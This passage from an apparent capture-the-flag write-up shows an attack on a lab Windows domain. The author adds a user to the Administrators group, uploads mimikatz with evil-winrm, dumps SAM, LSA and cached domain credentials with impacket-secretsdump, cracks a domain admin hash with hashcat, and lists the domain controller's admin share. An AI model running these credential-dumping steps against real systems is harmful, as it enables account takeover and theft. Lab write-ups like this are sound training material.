  UDP    0.0.0.0:3389           *:*                                    560
  UDP    0.0.0.0:4500           *:*                                    1380
  UDP    0.0.0.0:5353           *:*                                    1180
  UDP    0.0.0.0:5355           *:*                                    1180
  UDP    0.0.0.0:51027          *:*                                    1180
  UDP    0.0.0.0:60715          *:*                                    1180
  UDP    0.0.0.0:60802          *:*                                    1180
  UDP    10.0.23.116:137        *:*                                    4
  UDP    10.0.23.116:138        *:*                                    4
  UDP    127.0.0.1:49790        127.0.0.1:49790                        1372
  UDP    127.0.0.1:53991        127.0.0.1:53991                        832
  UDP    127.0.0.1:54801        127.0.0.1:54801                        1188
  UDP    127.0.0.1:62048        127.0.0.1:62048                        736
  UDP    [::]:123               *:*                                    1112
  UDP    [::]:500               *:*                                    1380
  UDP    [::]:3389              *:*                                    560
  UDP    [::]:4500              *:*                                    1380
  UDP    [::]:5353              *:*                                    1180
  UDP    [::]:5355              *:*                                    1180
  UDP    [::]:51027             *:*                                    1180
  UDP    [::]:60715             *:*                                    1180
  UDP    [::]:60802             *:*                                    1180
  
  
  C:\\Windows\\System32>netsh firewall show config

Domain profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Disable

Service configuration for Domain profile:
Mode     Customized  Name
-------------------------------------------------------------------
Enable   No          File and Printer Sharing
Enable   Yes         Network Discovery
Enable   No          Remote Desktop

Allowed programs configuration for Domain profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Domain profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

Standard profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Disable

Service configuration for Standard profile:
Mode     Customized  Name
-------------------------------------------------------------------
Enable   No          Remote Desktop

Allowed programs configuration for Standard profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Standard profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

Log configuration:
-------------------------------------------------------------------
File location   = C:\\Windows\\system32\\LogFiles\\Firewall\\pfirewall.log
Max file size   = 4096 KB
Dropped packets = Disable
Connections     = Disable

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at <https://go.microsoft.com/fwlink/?linkid=121488> .

```

We tried to dump the SAM and SYSTEM hives, but ran into authorization errors. Used the same method of making a user an Administrator:

```bash
C:\\Windows\\System32>net localgroup Administrators marks /add
The command completed successfully.
```

Now that he’s an Admin, we log back into RDP as this user, and use mimikatz. Used an evil-winrm session to upload mimikatz.exe easily

```bash
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ evil-winrm -i INTRANET -u 'marks' -p 'Hacksmarter123!'                 
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\MarkS\\Documents> upload mimikatz.exe
                                        
Info: Uploading /home/kali/hsm/lumon/mimikatz.exe to C:\\Users\\MarkS\\Documents\\mimikatz.exe
                                        
Data: 1807016 bytes of 1807016 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\\Users\\MarkS\\Documents> 
```

Next, RDPd into marks session, and when running powershell, I can authenticate as an administrator since I added them to the group

![image.png](/files/7izmXHfXOCFEkDLys2bE)

Using mimikatz commands found from here:

[SAM & LSA secrets | The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/sam-and-lsa-secrets#secrets-dump)

Trying to be funny and see if I can just see root.txt on the `hellye` user desktop, since I know they’re a domain admin

```bash

PS C:\\Users\\Administrator\\Desktop> cd ..
PS C:\\Users\\Administrator> cd ..
PS C:\\Users> ls

    Directory: C:\\Users

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         10/9/2025  10:14 PM                Administrator
d-----        10/12/2025   4:23 PM                harmonyc
d-----         10/9/2025   9:12 PM                hellye
d-----         10/9/2025  11:55 PM                intranetsvc
d-----        10/10/2025   1:11 AM                localadmin
d-----         10/9/2025  11:12 PM                MarkS
d-r---        11/20/2024  11:32 PM                Public

PS C:\\Users> cd hellye
PS C:\\Users\\hellye> ls

    Directory: C:\\Users\\hellye

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---         10/9/2025   9:12 PM                Contacts
d-r---        10/12/2025   9:21 PM                Desktop
d-r---         10/9/2025   9:12 PM                Documents
d-r---         10/9/2025   9:12 PM                Downloads
d-r---         10/9/2025   9:12 PM                Favorites
d-r---         10/9/2025   9:12 PM                Links
d-r---         10/9/2025   9:12 PM                Music
d-r---         10/9/2025   9:12 PM                Pictures
d-r---         10/9/2025   9:12 PM                Saved Games
d-r---        10/12/2025   4:33 PM                Searches
d-r---         10/9/2025   9:12 PM                Videos

PS C:\\Users\\hellye> cd Desktop
PS C:\\Users\\hellye\\Desktop> ls
PS C:\\Users\\hellye\\Desktop> ls -la
Get-ChildItem : A parameter cannot be found that matches parameter name 'la'.
At line:1 char:4
+ ls -la
+    ~~~
    + CategoryInfo          : InvalidArgument: (:) [Get-ChildItem], ParameterBindingException
    + FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

PS C:\\Users\\hellye\\Desktop> dir
PS C:\\Users\\hellye\\Desktop>
```

> No joy, lol

Now back to mimikatz

```bash
PS C:\\Users\\MarkS\\Documents> .\\mimikatz.exe
Program 'mimikatz.exe' failed to run: The specified executable is not a valid application for this OS platform.At
line:1 char:1
+ .\\mimikatz.exe
+ ~~~~~~~~~~~~~~.
At line:1 char:1
+ .\\mimikatz.exe
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

PS C:\\Users\\MarkS\\Documents>
```

I wonder if the exe I uploaded isn’t for Windows?

![image.png](/files/eren5CE1HoFgWCUI2Pv2)

![image.png](/files/ETrrd4R4H2Wpl6NQSb25)

{% hint style="info" %}
I’m pretty sure there’s something blocking this, but I’m not completely convinced. I downloaded a newer version of mimikatz and this still happened.
{% endhint %}

### Pivoting to [secretsdump.py](http://secretsdump.py)

```bash
                                                                                                                                                             
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ impacket-secretsdump 'lumons.hacksmarter/marks:Hacksmarter123!@INTRANET'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x75cd45c6e810aa97afd0d7afcc47e603
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d5cad8a9782b2879bf316f56936f1e36:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7490f2a63d713a813eda5bf8fd1a8227:::
localadmin:1003:aad3b435b51404eeaad3b435b51404ee:e01c8875cc4da7ecf2c4a37e9fa291f7:::
[*] Dumping cached domain logon information (domain/username:hash)
LUMONS.HACKSMARTER/IntranetSvc:$DCC2$10240#IntranetSvc#0604e068de4e681075537483c2686664: (2026-02-13 01:14:56+00:00)
LUMONS.HACKSMARTER/hellye:$DCC2$10240#hellye#62da21b55a047cda1bf1bebb132e48c9: (2025-11-07 01:31:10+00:00)
LUMONS.HACKSMARTER/harmonyc:$DCC2$10240#harmonyc#13e0bc086ece101dbfe8ddace8d790f1: (2026-02-12 02:06:05+00:00)
LUMONS.HACKSMARTER/MarkS:$DCC2$10240#MarkS#3dc4e13ef0537f2e5160fd7dc90b5199: (2026-02-14 02:19:28+00:00)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
LUMONS\\INTRANET$:aes256-cts-hmac-sha1-96:12d16ce1e94eb5b1df3e53f650a25acc26c40101e38bea9351f12f1769b96f4d
LUMONS\\INTRANET$:aes128-cts-hmac-sha1-96:ddcc9d442f36df12ba60c2d8abd1dcfa
LUMONS\\INTRANET$:des-cbc-md5:ad9d1a6de9375d92
LUMONS\\INTRANET$:plain_password_hex:560032004400310042004d0070004f00650052004d006400480042007000770034006c004a0048006e003700650078005700440038003d0054007700610062006700300075005500740035006e003d00760052004a0050002b0076006400700030004b0046002b007a004f003000350035005800330050007400620069003800450064006b007500540051004c00650030005800530070003900380071004b00640061004c0066005000630052004a007a00380070006e005a0052006900540051005000370078006b0057003d0049006c00360041007a007100730077006e0041006d0043006b006d00380043003d0039006f00650071007000370075004a003800370050005300730054005a00690068007600680033007a0055006400750047005700580035004e006900690042004e0030004d00390055006b004f007500580064005a0050003d006f005800580061003600700079007300640041004d00590079003d005a006d0049004d004d00410042006f00360034006a005200760054006e00530079005500440041004b0031006e005000330042003800370064006d002b005400360047006f00590030004b002b0061004f0033006400360041004200650039004900450030006e007700650035005a0069006f007300360073006c007100520052006a005400420053007a006e0053004d0036006e0068006a00
LUMONS\\INTRANET$:aad3b435b51404eeaad3b435b51404ee:2391ec074ed9200903677064798678c2:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb1c72f324c3529f33e6e8f55b8b2e07a62f06c52
dpapi_userkey:0x8a91f8d527a2aecbdb427de852923989e1f906db
[*] M$MachineBoundCertificate 
 0000   76 00 00 00 01 00 00 00  03 03 00 00 03 03 00 00   v...............
 0010   00 00 00 00 17 00 00 00  64 00 00 00 01 00 00 00   ........d.......
 0020   01 01 00 00 01 00 00 00  25 CD B5 29 43 16 8E 41   ........%..)C..A
 0030   66 5B 89 87 08 92 54 DC  EF 95 B5 A2 1F F4 3D 49   f[....T.......=I
 0040   42 16 34 FA C1 D2 1B AD  57 A6 D2 8F 37 3B 4A FC   B.4.....W...7;J.
 0050   B9 4F A0 2E 76 28 B7 D8  01 00 00 00 00 00 00 00   .O..v(..........
 0060   00 00 00 00 00 00 00 00  01 00 00 00 88 02 00 00   ................
 0070   4C 73 61 49 73 6F 41 73  79 6D 6D 65 74 72 69 63   LsaIsoAsymmetric
 0080   4B 65 79 42 6C 6F 62 83  16 B2 30 FA 1B 91 1E E1   KeyBlob...0.....
 0090   0D E5 5C 18 A3 0C 66 8B  44 6D EC B3 62 8B CA 5E   ..\\...f.Dm..b..^
 00a0   6E AF AA 5B 92 83 87 8C  B9 65 1E 09 34 BC 5D D4   n..[.....e..4.].
 00b0   9C 5D 41 08 6B 3D E0 A3  37 14 85 07 51 9C AA DE   .]A.k=..7...Q...
 00c0   54 F2 ED F4 55 82 D8 B6  68 C3 1B 3C C4 D1 60 9E   T...U...h..<..`.
 00d0   6D 42 EA CF EC DF 00 2C  A8 D6 E8 AC A4 07 02 8B   mB.....,........
 00e0   A0 59 A3 24 9B 6E 70 26  7B 0E E5 9F 7C 3F 08 19   .Y.$.np&{...|?..
 00f0   69 0C 85 D6 15 6E 2B 2D  54 DA A8 4B 4D 4C 41 10   i....n+-T..KMLA.
 0100   01 83 8B B8 7E ED 8E 85  DF 42 74 08 CF 5E 06 A8   ....~....Bt..^..
 0110   7F 9E D9 32 F2 1E 66 D4  60 EC C1 11 CE C4 1E 27   ...2..f.`......'
 0120   65 A1 48 3A 7E 9D 0E D3  DA BC 73 26 B3 B4 D0 4A   e.H:~.....s&...J
 0130   76 BF 71 F9 DB 9E 9A 8C  B4 F4 67 BA 4B 74 E8 BD   v.q.......g.Kt..
 0140   04 98 70 BD 75 1E 0C 12  BA 7E 40 30 E0 19 67 EA   ..p.u....~@0..g.
 0150   3D A8 A0 A7 33 A9 66 19  22 F3 08 87 5B BF E0 D1   =...3.f."...[...
 0160   FE C7 24 AB F7 E3 AA A8  B0 9A 3C 1F 16 3E BA B3   ..$.......<..>..
 0170   8C EA D9 F9 6A CA 6A 19  EB CA AA CB B0 B5 7D A6   ....j.j.......}.
 0180   37 56 FB A5 69 C1 38 60  03 02 F3 2E 98 D6 34 30   7V..i.8`......40
 0190   2D 71 67 49 50 19 D1 F5  9C 9F 5C 92 EC B2 A2 1D   -qgIP.....\\.....
 01a0   87 76 8E D0 C4 6D 08 5E  AA D8 AB 1A 66 29 FE BD   .v...m.^....f)..
 01b0   44 D8 11 DC A9 2C 66 55  D2 3B 1F 8E 12 EA 24 5F   D....,fU.;....$_
 01c0   76 72 91 FD 0F 43 6A 3E  24 33 B6 89 1A 20 49 97   vr...Cj>$3... I.
 01d0   EC F2 D5 4C FA 24 19 AB  79 B8 88 2C 95 9A 9F 03   ...L.$..y..,....
 01e0   D1 91 98 7F 16 38 BE 93  D7 8A 64 E4 FF FA 07 95   .....8....d.....
 01f0   D6 3B 84 E3 94 71 BE 53  77 4B B2 D6 F5 2D 97 BF   .;...q.SwK...-..
 0200   F2 17 DC E8 4C CF EC C8  E8 AA 1A 2C 1E 4E 5E C9   ....L......,.N^.
 0210   0C 34 86 CF 13 92 4B 32  AE 0C 3A 6D 4D 60 24 71   .4....K2..:mM`$q
 0220   D6 1E 93 D8 A5 7D 55 E0  33 A7 C4 8C 11 C9 43 FD   .....}U.3.....C.
 0230   34 36 D9 3E F8 DF 23 39  ED F0 DC 5F EC AE D0 40   46.>..#9..._...@
 0240   E6 3E 88 0B 4E 85 35 FF  92 5F B8 3B EF 22 C4 BD   .>..N.5.._.;."..
 0250   E7 7D 7B 01 22 45 47 24  B6 F8 53 6C 8E 95 A5 2D   .}{."EG$..Sl...-
 0260   55 58 6F 4E 7D D4 7F 9A  3D 6E 1F C5 3F 32 96 1F   UXoN}...=n..?2..
 0270   13 A2 E9 9A A7 4D 88 CB  02 31 BF 59 FE C0 56 F2   .....M...1.Y..V.
 0280   56 30 54 1D 03 10 CC 3E  6C 80 0C 18 08 AF 4B 14   V0T....>l.....K.
 0290   78 94 9D 88 89 AE 7F 90  13 76 59 73 4D 52 6E F7   x........vYsMRn.
 02a0   83 0C B6 AA B3 B6 5E 16  F9 98 E7 23 76 CC 42 BB   ......^....#v.B.
 02b0   28 00 3D 60 80 B7 F1 38  86 6D 8F 20 61 7B A3 22   (.=`...8.m. a{."
 02c0   6B 3E 13 BA 81 79 15 AA  70 2A B2 3E 65 F4 05 31   k>...y..p*.>e..1
 02d0   A6 B5 F2 CF 13 F8 FB 1B  AC E5 61 1B C6 08 E9 2E   ..........a.....
 02e0   65 15 08 B0 79 E1 ED D9  E1 A0 E1 7F AF 33 33 CA   e...y........33.
 02f0   4D 9D B4 25 6A C6 AA BF  3A 4F 17 B4 AB C6 3E DF   M..%j...:O....>.
 0300   66 90 0B 3D 1D E9 AC 79  01 A1 DE 60 96 92 CA 20   f..=...y...`... 
 0310   00 00 00 01 00 00 00 AB  02 00 00 30 82 02 A7 30   ...........0...0
 0320   82 01 8F A0 03 02 01 02  02 01 01 30 0D 06 09 2A   ...........0...*
 0330   86 48 86 F7 0D 01 01 0B  05 00 30 16 31 14 30 12   .H........0.1.0.
 0340   06 03 55 04 03 0C 0B 43  4E 3D 49 4E 54 52 41 4E   ..U....CN=INTRAN
 0350   45 54 30 20 17 0D 32 35  31 30 30 39 32 32 31 31   ET0 ..2510092211
 0360   34 38 5A 18 0F 32 31 32  35 30 39 31 35 32 32 31   48Z..21250915221
 0370   31 34 38 5A 30 16 31 14  30 12 06 03 55 04 03 0C   148Z0.1.0...U...
 0380   0B 43 4E 3D 49 4E 54 52  41 4E 45 54 30 82 01 22   .CN=INTRANET0.."
 0390   30 0D 06 09 2A 86 48 86  F7 0D 01 01 01 05 00 03   0...*.H.........
 03a0   82 01 0F 00 30 82 01 0A  02 82 01 01 00 D1 E1 0A   ....0...........
 03b0   3C 36 C5 B1 89 20 57 65  92 80 BC C0 AF 0C F5 18   <6... We........
 03c0   27 60 3A 31 65 44 11 36  AA 2F 88 26 0C 59 C0 18   '`:1eD.6./.&.Y..
 03d0   B6 B5 30 D0 B8 FC 32 E4  B1 20 57 80 44 DB C4 67   ..0...2.. W.D..g
 03e0   F8 98 9B BD 0F 1B A2 EF  84 8F D0 5E 10 E1 3C 93   ...........^..<.
 03f0   87 30 ED 45 8E 41 60 19  B2 0C 1E 5D 67 C8 09 F8   .0.E.A`....]g...
 0400   C6 D2 ED 68 2F 7D C1 C3  37 64 9E B6 A7 7F 53 C1   ...h/}..7d....S.
 0410   A0 16 09 15 45 9F 84 30  B8 A5 4D 68 74 F8 B4 88   ....E..0..Mht...
 0420   DD C3 6F 5C 25 70 CA DE  82 72 81 13 E5 AD A4 36   ..o\\%p...r.....6
 0430   71 F8 1E E8 62 B2 F0 21  D5 2D 6D 74 B4 50 E5 8C   q...b..!.-mt.P..
 0440   D1 65 65 6E 52 8F 7D D5  D8 C2 D9 0D 62 F9 C4 33   .eenR.}.....b..3
 0450   C6 13 93 D5 2F 56 87 81  67 41 2A BC F4 74 47 6F   ..../V..gA*..tGo
 0460   C9 AB E1 3C 69 68 76 28  81 F2 A0 95 CF 1E 6B 9A   ...<ihv(......k.
 0470   1A 02 56 73 01 F6 0C 16  91 F6 1E F7 C7 E3 18 AF   ..Vs............
 0480   79 47 5E 35 A2 44 08 A9  F8 81 8E 50 06 79 B6 E1   yG^5.D.....P.y..
 0490   1F A1 5E 2F 2C E5 55 21  63 40 75 B2 36 E5 63 B1   ..^/,.U!c@u.6.c.
 04a0   C6 3A B6 E1 2A FF D7 CA  DF D4 F4 D5 9D 02 03 01   .:..*...........
 04b0   00 01 30 0D 06 09 2A 86  48 86 F7 0D 01 01 0B 05   ..0...*.H.......
 04c0   00 03 82 01 01 00 A4 A1  F4 54 F8 2A 37 4A BE DE   .........T.*7J..
 04d0   2D B2 45 86 3B 85 96 D7  F5 FE F0 55 1B 58 B1 43   -.E.;......U.X.C
 04e0   36 A0 3B E2 99 01 E4 1B  C9 C4 F3 52 FE 1A 0A A6   6.;........R....
 04f0   58 DC 69 A8 A0 40 67 33  38 35 05 3D 11 5D 13 E4   X.i..@g385.=.]..
 0500   42 E0 DB 90 1C 35 86 95  A5 A9 86 DF B2 15 1E 69   B....5.........i
 0510   FE C5 CB DC 03 A0 F2 BC  25 6D 9D 87 A7 43 81 BB   ........%m...C..
 0520   74 D1 BE 8C E5 81 F3 48  7C 2D 7A 7D 4E 50 12 0F   t......H|-z}NP..
 0530   31 B2 CE BE CE 56 37 BB  7F 26 47 C8 B3 07 05 46   1....V7..&G....F
 0540   F4 3D 4F 84 0D 16 BD 38  43 90 7C DF A4 5E 08 57   .=O....8C.|..^.W
 0550   33 B1 F1 6E FB FF 0F DF  AC FC B5 31 67 7A C3 1A   3..n.......1gz..
 0560   29 CC 92 0F F6 C6 76 E6  85 D6 86 14 41 EE 52 0D   ).....v.....A.R.
 0570   1D FA EC FF 70 21 3E 16  30 09 FE 2C 68 15 36 6C   ....p!>.0..,h.6l
 0580   DB A5 42 9A 06 B3 5A 46  4D CD 62 F9 96 8E 6F 39   ..B...ZFM.b...o9
 0590   B1 9A 78 F7 E4 2D 8E A3  48 A7 5F BE 74 A8 F0 90   ..x..-..H._.t...
 05a0   06 2A 3B 47 49 71 44 71  82 D5 85 6D EF E9 68 E0   .*;GIqDq...m..h.
 05b0   AF 6C 32 FA D9 FD CE CB  3F 4C 53 20 81 5B 3A E6   .l2.....?LS .[:.
 05c0   AE 85 0E 32 5A 14                                  ...2Z.
M$MachineBoundCertificate:7600000001000000030300000303000000000000170000006400000001000000010100000100000025cdb52943168e41665b8987089254dcef95b5a21ff43d49421634fac1d21bad57a6d28f373b4afcb94fa02e7628b7d80100000000000000000000000000000001000000880200004c736149736f4173796d6d65747269634b6579426c6f628316b230fa1b911ee10de55c18a30c668b446decb3628bca5e6eafaa5b9283878cb9651e0934bc5dd49c5d41086b3de0a337148507519caade54f2edf45582d8b668c31b3cc4d1609e6d42eacfecdf002ca8d6e8aca407028ba059a3249b6e70267b0ee59f7c3f0819690c85d6156e2b2d54daa84b4d4c411001838bb87eed8e85df427408cf5e06a87f9ed932f21e66d460ecc111cec41e2765a1483a7e9d0ed3dabc7326b3b4d04a76bf71f9db9e9a8cb4f467ba4b74e8bd049870bd751e0c12ba7e4030e01967ea3da8a0a733a9661922f308875bbfe0d1fec724abf7e3aaa8b09a3c1f163ebab38cead9f96aca6a19ebcaaacbb0b57da63756fba569c138600302f32e98d634302d7167495019d1f59c9f5c92ecb2a21d87768ed0c46d085eaad8ab1a6629febd44d811dca92c6655d23b1f8e12ea245f767291fd0f436a3e2433b6891a204997ecf2d54cfa2419ab79b8882c959a9f03d191987f1638be93d78a64e4fffa0795d63b84e39471be53774bb2d6f52d97bff217dce84ccfecc8e8aa1a2c1e4e5ec90c3486cf13924b32ae0c3a6d4d602471d61e93d8a57d55e033a7c48c11c943fd3436d93ef8df2339edf0dc5fecaed040e63e880b4e8535ff925fb83bef22c4bde77d7b0122454724b6f8536c8e95a52d55586f4e7dd47f9a3d6e1fc53f32961f13a2e99aa74d88cb0231bf59fec056f25630541d0310cc3e6c800c1808af4b1478949d8889ae7f90137659734d526ef7830cb6aab3b65e16f998e72376cc42bb28003d6080b7f138866d8f20617ba3226b3e13ba817915aa702ab23e65f40531a6b5f2cf13f8fb1bace5611bc608e92e651508b079e1edd9e1a0e17faf3333ca4d9db4256ac6aabf3a4f17b4abc63edf66900b3d1de9ac7901a1de609692ca2000000001000000ab020000308202a73082018fa003020102020101300d06092a864886f70d01010b050030163114301206035504030c0b434e3d494e5452414e45543020170d3235313030393232313134385a180f32313235303931353232313134385a30163114301206035504030c0b434e3d494e5452414e455430820122300d06092a864886f70d01010105000382010f003082010a0282010100d1e10a3c36c5b1892057659280bcc0af0cf51827603a3165441136aa2f88260c59c018b6b530d0b8fc32e4b120578044dbc467f8989bbd0f1ba2ef848fd05e10e13c938730ed458e416019b20c1e5d67c809f8c6d2ed682f7dc1c337649eb6a77f53c1a0160915459f8430b8a54d6874f8b488ddc36f5c2570cade82728113e5ada43671f81ee862b2f021d52d6d74b450e58cd165656e528f7dd5d8c2d90d62f9c433c61393d52f56878167412abcf474476fc9abe13c6968762881f2a095cf1e6b9a1a02567301f60c1691f61ef7c7e318af79475e35a24408a9f8818e500679b6e11fa15e2f2ce55521634075b236e563b1c63ab6e12affd7cadfd4f4d59d0203010001300d06092a864886f70d01010b05000382010100a4a1f454f82a374abede2db245863b8596d7f5fef0551b58b14336a03be29901e41bc9c4f352fe1a0aa658dc69a8a04067333835053d115d13e442e0db901c358695a5a986dfb2151e69fec5cbdc03a0f2bc256d9d87a74381bb74d1be8ce581f3487c2d7a7d4e50120f31b2cebece5637bb7f2647c8b3070546f43d4f840d16bd3843907cdfa45e085733b1f16efbff0fdfacfcb531677ac31a29cc920ff6c676e685d6861441ee520d1dfaecff70213e163009fe2c6815366cdba5429a06b35a464dcd62f9968e6f39b19a78f7e42d8ea348a75fbe74a8f090062a3b474971447182d5856defe968e0af6c32fad9fdcecb3f4c5320815b3ae6ae850e325a14
[*] NL$KM 
 0000   D6 F9 1E BE 20 95 21 6A  88 22 1F 5C 92 CE 2C 8A   .... .!j.".\\..,.
 0010   BB CF 2C 38 59 53 A4 3A  EF A0 03 DA EA A5 A8 CF   ..,8YS.:........
 0020   0E 6F 91 92 02 3E 5B 45  40 E2 C7 A8 D5 DA 8B 11   .o...>[E@.......
 0030   6D 77 6B 5F 3F 78 48 12  0F BF A8 CE 06 C2 C6 7C   mwk_?xH........|
NL$KM:d6f91ebe2095216a88221f5c92ce2c8abbcf2c385953a43aefa003daeaa5a8cf0e6f9192023e5b4540e2c7a8d5da8b116d776b5f3f7848120fbfa8ce06c2c67c
[*] _SC_AutomateServices 
LUMONS\\harmonyc:h@rmony08
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
```

### `hellye` is a DA, so I’m going to concentrate on this person

```bash
$DCC2$10240#hellye#62da21b55a047cda1bf1bebb132e48c9:Security&system
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 2100 (Domain Cached Credentials 2 (DCC2), MS Cache 2)
Hash.Target......: $DCC2$10240#hellye#62da21b55a047cda1bf1bebb132e48c9
Time.Started.....: Fri Feb 13 21:41:50 2026 (1 min, 38 secs)
Time.Estimated...: Fri Feb 13 21:43:28 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:    21272 H/s (11.43ms) @ Accel:1024 Loops:640 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2093056/14344385 (14.59%)
Rejected.........: 0/2093056 (0.00%)
Restore.Point....: 2088960/14344385 (14.56%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:9600-10239
Candidate.Engine.: Device Generator
Candidates.#01...: TEAMODARIO -> SaTeLlItE
Hardware.Mon.#01.: Util: 90%

Started: Fri Feb 13 21:41:24 2026
Stopped: Fri Feb 13 21:43:29 2026
```

```bash
hellye:Security&system
```

I tried to get a shell as `hellye`, but can only do so on INTRANET, but there’s no root flag on that machine. The DC doesn’t allow me to evil-winrm into it. Will try and RDP into the DC instead, and then test out [smbclient.py](http://smbclient.py)

This person’s name is Helly Eagan

![image.png](/files/WFVkne3QzrWkDFTTvNTu)

### smbclient

```bash
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ impacket-smbclient hellye@DC01                                          
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
Type help for list of commands
# ls
[-] No share selected
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use ADMIN$
# ls
drw-rw-rw-          0  Fri Oct 10 23:08:11 2025 .
drw-rw-rw-          0  Thu Oct  9 15:35:48 2025 ..
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 ADFS
drw-rw-rw-          0  Thu Oct  9 14:08:58 2025 ADWS
drw-rw-rw-          0  Wed Jan 15 16:44:02 2025 AppCompat
drw-rw-rw-          0  Tue Feb 10 22:44:48 2026 apppatch
drw-rw-rw-          0  Fri Feb 13 21:49:10 2026 AppReadiness
drw-rw-rw-          0  Wed Nov 13 20:33:19 2024 assembly
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 AzureArcSetup
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 bcastdvr
-rw-rw-rw-     126976  Wed Mar 12 07:03:14 2025 bfsvc.exe
drw-rw-rw-          0  Wed Nov 13 20:49:32 2024 Boot
-rw-rw-rw-      67584  Fri Feb 13 20:46:28 2026 bootstat.dat
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 Branding
drw-rw-rw-          0  Wed Nov 13 20:49:40 2024 BrowserCore
drw-rw-rw-          0  Thu Feb 12 19:32:25 2026 CbsTemp
-rw-rw-rw-        277  Thu Oct  9 15:28:39 2025 certenroll.log
-rw-rw-rw-      21986  Thu Oct  9 15:30:38 2025 certocm.log
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 Cursors
drw-rw-rw-          0  Fri Feb 13 20:44:44 2026 debug
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 diagnostics
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 DiagTrack
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 DigitalLocker
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 Downloaded Program Files
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 drivers
-rw-rw-rw-      17090  Tue Oct  7 17:56:07 2025 DtcInstall.log
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 ELAMBKUP
drw-rw-rw-          0  Wed Mar 12 07:02:34 2025 en-US
-rw-rw-rw-    2774080  Wed Mar 12 07:03:15 2025 explorer.exe
drw-rw-rw-          0  Wed Mar 12 07:02:34 2025 Fonts
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 Globalization
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 Help
-rw-rw-rw-    1085440  Wed Mar 12 07:03:20 2025 HelpPane.exe
-rw-rw-rw-      40960  Wed Mar 12 07:03:18 2025 hh.exe
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 IdentityCRL
drw-rw-rw-          0  Wed Nov 13 20:49:40 2024 IME
drw-rw-rw-          0  Wed Mar 12 07:02:34 2025 ImmersiveControlPanel
drw-rw-rw-          0  Fri Feb 13 20:48:51 2026 INF
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 InputMethod
drw-rw-rw-          0  Wed Mar 12 06:28:36 2025 Installer
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 L2Schemas
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 LanguageOverlayCache
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 LiveKernelReports
drw-rw-rw-          0  Fri Oct 10 22:56:22 2025 Logs
-rw-rw-rw-       1380  Thu Nov 14 04:20:19 2024 lsasetup.log
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 Media
-rw-rw-rw-      43131  Wed Nov 13 19:54:41 2024 mib.bin
drw-rw-rw-          0  Fri Feb 13 20:55:58 2026 Microsoft.NET
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 Migration
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 ModemLogs
-rw-rw-rw-     360448  Wed Mar 12 07:03:18 2025 notepad.exe
drw-rw-rw-          0  Fri Feb 13 20:44:24 2026 NTDS
